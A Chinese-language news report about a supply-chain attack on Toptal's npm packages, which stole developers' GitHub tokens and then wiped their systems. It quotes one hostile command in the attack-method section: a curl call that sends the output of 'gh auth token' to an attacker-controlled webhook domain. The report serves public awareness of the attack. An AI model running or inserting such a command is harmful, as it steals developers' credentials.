网络安全公司Socket最新报告显示,全球知名人才机构Toptal的npm官方页面遭黑客入侵,其发布的10个JavaScript软件包被植入恶意代码,累计下载量达5000次。目前受影响软件包已从npm下架,但5000名开发者仍需紧急排查系统安全状况。

https://s3-img.meituan.net/v1/mss_3d027b52ec5a4d589e68050845611e68/ff/n0/0a/kd/2p_196333.jpg@596w_1l.jpg

攻击手法:双重渗透的精准打击

  1. 入侵源头锁定GitHub
    攻击者首先攻破Toptal的GitHub组织账户,利用该权限向npm推送恶意包。安全专家指出,黑客可能通过两种路径实现:

    • 利用GitHub Actions自动化流程
    • 窃取存储的npm发布令牌
  2. 恶意载荷双重杀伤链
    被植入的恶意代码分两阶段执行:

    • 信息窃取阶段
      通过命令行curl -d "$(gh auth token)" [恶意域名]窃取用户GitHub身份令牌,将凭证传输至黑客控制的webhook.si te域名端点
    • 系统摧毁阶段
      获取凭证后自动触发系统删除脚本,针对Windows/Unix系统分别执行文件系统清除指令

安全困局:开源信任体系遭冲击

  1. 响应滞后暴露漏洞
    Toptal至今未公布账户遭入侵的具体原因,官方对安全质询保持沉默。安全团队坦言:”缺乏完整数字取证证据,难以精确还原攻击链条”。
  2. 开源审查机制失效
    Socket报告指出核心矛盾:

    “要求用户在使用前审查所有程序”在现实中根本不可行。普通用户缺乏编译知识,专业开发者又无足够时间逐行检查项目代码及依赖库。

  3. 信任根基面临崩塌
    业内专家发出预警:随着攻击者通过贿赂、胁迫等手段控制主流库的风险上升,开源生态或将迎来三大变革:

    • 强制AI安全扫描成为发布前置条件
    • 实施更严格的账户身份验证机制
    • 个人开发者参与门槛显著提高

消息来源:https://arstechnica.com/security/2025/07/open-source-repositories-are-seeing-a-rash-of-supply-chain-attacks/